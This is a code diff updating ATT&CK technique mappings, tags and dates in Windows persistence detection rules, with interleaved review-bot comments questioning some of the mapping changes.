+++ b/rules/windows/persistence_user_account_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -87,19 +87,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1136" name = "Create Account" reference = "https://attack.mitre.org/techniques/T1136/" -[[rule.threat.technique.subtechnique]] -id = "T1136.001" -name = "Local Account" -reference = "https://attack.mitre.org/techniques/T1136/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1136.002" +name = "Domain Account" +reference = "https://attack.mitre.org/techniques/T1136/002/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/persistence_via_application_shimming.toml b/rules/windows/persistence_via_application_shimming.toml index 1fb717e1aa7..68f099a5741 100644 --- a/rules/windows/persistence_via_application_shimming.toml +++ b/rules/windows/persistence_via_application_shimming.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/01" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
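Review bot: Replacing T1136.001 Local Account with T1136.002 Domain Account, rather than adding the latter, asserts that the rule no longer observes local account creation; the query is outside this hunk, but if it still matches local `net user … /add` style invocations without a domain switch, local accounts are what it will fire on most often and both sub-techniques belong under the single T1136 technique entry. If the query was narrowed to domain-only variants elsewhere in the series, the rule name and description should be updated to match, and the commit message should say so since it changes ATT&CK coverage.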
@@ -64,20 +64,7 @@ Application shimming is a Windows feature designed to ensure software compatibil risk_score = 21 rule_id = "fd4a992d-6130-4802-9ff8-829b89ae801f" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -101,36 +88,36 @@ process where host.os.type == "windows" and event.type == "start" and process.na [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.011" name = "Application Shimming" reference = "https://attack.mitre.org/techniques/T1546/011/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.011" name = "Application Shimming" reference = "https://attack.mitre.org/techniques/T1546/011/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/persistence_via_bits_job_notify_command.toml b/rules/windows/persistence_via_bits_job_notify_command.toml index d5ed04b003e..d2a901ab4b0 100644 --- a/rules/windows/persistence_via_bits_job_notify_command.toml +++ b/rules/windows/persistence_via_bits_job_notify_command.toml @@ -2,7 +2,7 @@ creation_date = "2021/12/04" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -68,18 +68,7 @@ references = [ risk_score = 47 rule_id = "c3b915e0-22f3-4bf7-991d-b643513c722f" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -96,14 +85,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1197" name = "BITS Jobs" reference = "https://attack.mitre.org/techniques/T1197/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1197" +name = "BITS Jobs" +reference = "https://attack.mitre.org/techniques/T1197/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/persistence_via_hidden_run_key_valuename.toml b/rules/windows/persistence_via_hidden_run_key_valuename.toml index 1d217e04fb3..7a10e60c00b 100644 --- a/rules/windows/persistence_via_hidden_run_key_valuename.toml +++ b/rules/windows/persistence_via_hidden_run_key_valuename.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/11/15" integration = ["endpoint", "windows", "crowdstrike", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,21 +65,7 @@ references = [ risk_score = 73 rule_id = "a9b05c3b-b304-4bf9-970d-acdfaef2944c" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint"] timestamp_override = "event.ingested" type = "eql" 
@@ -97,43 +83,31 @@ registry where host.os.type == "windows" and event.type == "change" and length(r [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1106" -name = "Native API" -reference = "https://attack.mitre.org/techniques/T1106/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/persistence_via_lsa_security_support_provider_registry.toml b/rules/windows/persistence_via_lsa_security_support_provider_registry.toml index 909fe26fa75..6abda8ce324 100644 --- a/rules/windows/persistence_via_lsa_security_support_provider_registry.toml +++ b/rules/windows/persistence_via_lsa_security_support_provider_registry.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -61,20 +61,7 @@ Security Support Providers (SSPs) in Windows environments facilitate authenticat risk_score = 47 rule_id = "e86da94d-e54b-4fb5-b96c-cecff87e8787" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -97,31 +84,18 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.005" name = "Security Support Provider" reference = "https://attack.mitre.org/techniques/T1547/005/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml b/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml index 5ce887dd079..f7f30b2155d 100644 --- a/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml +++ b/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -96,46 +96,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/persistence_via_update_orchestrator_service_hijack.toml b/rules/windows/persistence_via_update_orchestrator_service_hijack.toml index 4c77031fe53..9e805a654b8 100644 --- a/rules/windows/persistence_via_update_orchestrator_service_hijack.toml +++ b/rules/windows/persistence_via_update_orchestrator_service_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
@@ -147,36 +147,56 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.011" +name = "Services Registry Permissions Weakness" +reference = "https://attack.mitre.org/techniques/T1574/011/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.011" +name = "Services Registry Permissions Weakness" +reference = "https://attack.mitre.org/techniques/T1574/011/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml b/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml index a064ad7db7c..998595a716a 100644 
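Review bot: Blank-line separation between TOML tables is uneven in the new threat mapping: the T1543 technique and its sub-technique are preceded by an added blank line, but the added `[[rule.threat.technique]]` for T1574 and the added `[[rule.threat.technique.subtechnique]]` for T1574.011 follow the previous `reference = ...` directly, in both tactic entries. The same mixed spacing appears in the threat hunks at L1342, L1344, L1346, L1347 and L1348. If a formatter produces these files, it should separate every `[[rule.threat]]`, `[[rule.threat.technique]]`, `[[rule.threat.technique.subtechnique]]` and `[rule.threat.tactic]` header from the preceding key with exactly one blank line, so that technique blocks are visually delimited the same way throughout the repository.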
--- a/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml +++ b/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/04" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -63,21 +63,7 @@ references = ["https://www.elastic.co/security-labs/hunting-for-persistence-usin risk_score = 21 rule_id = "9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -91,31 +77,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.003" name = "Windows Management Instrumentation Event Subscription" reference = "https://attack.mitre.org/techniques/T1546/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1047" -name = "Windows Management Instrumentation" -reference = "https://attack.mitre.org/techniques/T1047/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/persistence_via_wmi_stdregprov_run_services.toml b/rules/windows/persistence_via_wmi_stdregprov_run_services.toml index df5ba00f618..d1fe98c2dbe 100644 --- a/rules/windows/persistence_via_wmi_stdregprov_run_services.toml +++ b/rules/windows/persistence_via_wmi_stdregprov_run_services.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/15" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/03" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -100,15 +100,7 @@ references = [ risk_score = 73 rule_id = "70d12c9c-0dbd-4a1a-bc44-1467502c9cf6" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -170,41 +162,46 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1047" -name = "Windows Management Instrumentation" -reference = "https://attack.mitre.org/techniques/T1047/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/persistence_via_xp_cmdshell_mssql_stored_procedure.toml b/rules/windows/persistence_via_xp_cmdshell_mssql_stored_procedure.toml index 848ae070ecd..fd99f614a1a 100644 --- a/rules/windows/persistence_via_xp_cmdshell_mssql_stored_procedure.toml +++ b/rules/windows/persistence_via_xp_cmdshell_mssql_stored_procedure.toml 
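Review bot: T1112 (Modify Registry) is added inside the TA0003 Persistence entry, but in the ATT&CK Enterprise matrix, as far as I recall it, T1112 belongs to the Defense Evasion tactic only, so this places a technique under a tactic it is not mapped to; the rest of the patch (the hunks at L1330 and L1350) puts T1112 under TA0005, which is the consistent choice. Either give it its own `[[rule.threat]]` entry whose `[rule.threat.tactic]` has `id = "TA0005"` and `name = "Defense Evasion"` and add the matching `"Tactic: Defense Evasion"` tag in the preceding tags hunk, or drop the technique from this rule. The new TA0002 entry for T1047 and the T1543.003 / T1547.001 mappings under Persistence look correct.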
@@ -2,7 +2,7 @@ creation_date = "2020/08/14" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,20 +62,7 @@ references = ["https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ risk_score = 47 rule_id = "4ed493fc-d637-4a36-80ff-ac84937e5461" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "new_terms" 
@@ -108,39 +95,39 @@ process.parent.name:"sqlservr.exe" and process.command_line : * and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" -[[rule.threat.technique.subtechnique]] -id = "T1505.001" -name = "SQL Stored Procedures" -reference = "https://attack.mitre.org/techniques/T1505/001/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.001" +name = "SQL Stored Procedures" +reference = "https://attack.mitre.org/techniques/T1505/001/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.command_line"] diff --git a/rules/windows/persistence_webshell_detection.toml b/rules/windows/persistence_webshell_detection.toml index 9999667d1d4..d2463cba3c3 100644 --- a/rules/windows/persistence_webshell_detection.toml +++ b/rules/windows/persistence_webshell_detection.toml 
@@ -2,7 +2,7 @@ creation_date = "2021/08/24" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/01/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -78,22 +78,7 @@ references = [ risk_score = 73 rule_id = "2917d495-59bd-4250-b395-c29409b76086" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Initial Access", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "new_terms" 
@@ -153,35 +138,7 @@ value = "*?:\\\\Program Files (x86)\\\\*" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" -[[rule.threat.technique.subtechnique]] -id = "T1505.003" -name = "Web Shell" -reference = "https://attack.mitre.org/techniques/T1505/003/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" @@ -191,6 +148,7 @@ reference = "https://attack.mitre.org/techniques/T1047/" id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -206,14 +164,28 @@ id = "T1059.005" name = "Visual Basic" reference = "https://attack.mitre.org/techniques/T1059/005/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.command_line"] 
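Review bot: The first threat hunk deletes the entire `[[rule.threat]]` entry for T1190 / TA0001 Initial Access, and the tags hunk before it drops `"Tactic: Initial Access"`, so the web-shell rule now reports only Execution and Persistence. None of the hunks in this section touch the query (they cover `updated_date`, `tags` and the threat tables), so this narrows the rule's ATT&CK coverage rather than tracking a detection change; a web shell is normally the persistence half of a T1190 intrusion, which is presumably why the mapping was there. If the removal is deliberate, a sentence in the PR description would help reviewers; otherwise retain the T1190 entry with `[rule.threat.tactic]` `id = "TA0001"` / `name = "Initial Access"` and the corresponding tag. Moving the T1505.003 entry after the Execution entry matches the alphabetical tactic order used elsewhere in the patch.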
diff --git a/rules/windows/persistence_werfault_reflectdebugger.toml b/rules/windows/persistence_werfault_reflectdebugger.toml index 10b36a1c675..518c4aa2c20 100644 --- a/rules/windows/persistence_werfault_reflectdebugger.toml +++ b/rules/windows/persistence_werfault_reflectdebugger.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "windows", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -89,26 +89,18 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.012" +name = "Image File Execution Options Injection" +reference = "https://attack.mitre.org/techniques/T1546/012/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/privilege_escalation_account_takeover_mixed_logon_types.toml b/rules/windows/privilege_escalation_account_takeover_mixed_logon_types.toml index 98d75bb0f11..c8ff89d715e 100644 --- a/rules/windows/privilege_escalation_account_takeover_mixed_logon_types.toml +++ b/rules/windows/privilege_escalation_account_takeover_mixed_logon_types.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/25" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
